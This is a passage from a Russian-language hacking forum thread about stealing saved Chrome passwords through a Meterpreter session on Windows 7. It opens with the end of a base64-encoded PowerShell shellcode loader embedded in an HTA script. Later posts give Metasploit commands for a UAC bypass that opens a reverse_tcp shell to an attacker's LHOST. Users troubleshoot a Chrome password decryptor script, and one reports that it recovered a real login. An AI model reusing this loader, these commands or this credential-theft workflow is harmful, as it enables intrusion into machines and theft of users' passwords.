ZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABWAGcAIAA9ACAAJABBAHIALgBMAGUAbgBnAHQAaAB9ADsAJABTAHEAPQAkAE0ATAA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAFYAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAEYAcQA9ADAAOwAkAEYAcQAgAC0AbABlACAAKAAkAEEAcgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABGAHEAKwArACkAIAB7ACQATQBMADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBxAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEYAcQApACwAIAAkAEEAcgBbACQARgBxAF0ALAAgADEAKQB9ADsAJABNAEwAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAcQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAVgBnAEgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVwBVAFMAKQApADsAJABkAHgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQQBpACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEEAaQAgACQAZAB4ACAAJABWAGcASAAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABkAHgAIAAkAFYAZwBIACIAOwB9AA\'+\'==\')"', 0);window.close();
</script>
[/B]
Нажмите, чтобы раскрыть...

причем тут вообще hta от unicorn? В моей статье хоть слово есть про это?) В винде ты где команды прописываешь?

Код: 
Будучи в метерпретере
shell
code
[doublepost=1512397216,1512394110][/doublepost]
~localhost сказал(а):
у меня на стадии миграции уже проблемы, windows 7 pro. sp1
Нажмите, чтобы раскрыть...
Попробуй bypassuac сделать для начала тогда.. Почитать можно здесь ТЫК
 
~localhost

~localhost

Green Team
30.10.2017
230
49
BIT
18
[doublepost=1512397216,1512394110][/doublepost]
Попробуй bypassuac сделать для начала тогда.. Почитать можно здесь ТЫК[/quote]

каким то чудом мигрировал, но что то не так.

пишу C:\windows\system32\folden>powershell -file Chrome_Passwords_Decryptor.ps1 нажимаю интер
появляется так
powershell -file Chrome_Passwords_Decryptor.ps1
жму еще раз интер и какая то ошибка видимо на русском так как у меня знаки вопроса.
 
O

OneDollar

~localhost сказал(а):
[doublepost=1512397216,1512394110][/doublepost]
Попробуй bypassuac сделать для начала тогда.. Почитать можно здесь ТЫК
Нажмите, чтобы раскрыть...

каким то чудом мигрировал, но что то не так.

пишу C:\windows\system32\folden>powershell -file Chrome_Passwords_Decryptor.ps1 нажимаю интер
появляется так
powershell -file Chrome_Passwords_Decryptor.ps1
жму еще раз интер и какая то ошибка видимо на русском так как у меня знаки вопроса.
[/quote]
скрин хотя бы дай
 
~localhost

~localhost

Green Team
30.10.2017
230
49
BIT
18
OneDollar сказал(а):
каким то чудом мигрировал, но что то не так.

пишу C:\windows\system32\folden>powershell -file Chrome_Passwords_Decryptor.ps1 нажимаю интер
появляется так
powershell -file Chrome_Passwords_Decryptor.ps1
жму еще раз интер и какая то ошибка видимо на русском так как у меня знаки вопроса.
Нажмите, чтобы раскрыть...
скрин хотя бы дай[/quote]

5.png

после мигрирования вроде и enum_chrome другие ошибки пишет
chrome.png
 
Последнее редактирование:
SooLFaa

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
А вот у моего метода никакие эскалации не нужны.
 
SooLFaa

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
Проверял он чистый как слеза младенца. Удж свои то билды я знаю.
 
SooLFaa

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
~localhost сказал(а):
если про этот https://codeby.net/threads/voruem-paroli-iz-google-chrome.58962/ то на скрине выше видно что он не отработал, возможно я что то делаю не так.
Нажмите, чтобы раскрыть...
Потому что сломан билд. Защита от скрипт киддис. Нужно обладать минимальными навыками программирования чтобы восстановить
 
~localhost

~localhost

Green Team
30.10.2017
230
49
BIT
18
SooLFaa сказал(а):
Потому что сломан билд. Защита от скрипт киддис. Нужно обладать минимальными навыками программирования чтобы восстановить
Нажмите, чтобы раскрыть...
я вроде не чего не делал с ним :DDDD. навыки программирования: "моргал диодом Arduino"

кстати если не мигрировать то выдает так
метер.png
 
Последнее редактирование:
IKUS

IKUS

Green Team
06.10.2017
20
2
BIT
0
Респект , Уважуха АФФтару ! Заработало с допилкой его ! - по процессам AMD 64 . У меня тестовая машина - win 7 x64
PS . Кстати , выдал логин , пароль это сайта при регистрации . Если спалил контору ,сорри , удалю комментарий
 
Последнее редактирование:
  • Нравится
Реакции: OneDollar
IKUS

IKUS

Green Team
06.10.2017
20
2
BIT
0
~~^Shad0w __ Just1ce^~~ сказал(а):
Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код: 
use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j
Нажмите, чтобы раскрыть...

---

таким способом не получилось , в прочим как и остальными , смотреть скрины...

Это касается исключительно повышения привилегий ( немного не в тему дня )



upload_2017-12-13_14-21-36.png


upload_2017-12-13_14-23-2.png
 
O

OneDollar

IKUS сказал(а):
---

таким способом не получилось , в прочим как и остальными , смотреть скрины...

Это касается исключительно повышения привилегий ( немного не в тему дня )



Посмотреть вложение 13831

Посмотреть вложение 13832
Нажмите, чтобы раскрыть...
посмотри каким методом делал я, у тебя все получится. Я вчера проверял в империи и метере, специально. Все работает
 
IKUS

IKUS

Green Team
06.10.2017
20
2
BIT
0
OneDollar сказал(а):
посмотри каким методом делал я, у тебя все получится. Я вчера проверял в империи и метере, специально. Все работает
Нажмите, чтобы раскрыть...

делал как в твоей - статье

Вот именно в такой ситуации и не получается

Всегда моделирую не простые задачи , не знаешь с чем столкнешься



upload_2017-12-13_18-35-30.png
 

Вложения

  • upload_2017-12-13_18-34-4.png
    upload_2017-12-13_18-34-4.png
    5,1 КБ · Просмотры: 119
Последнее редактирование:
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ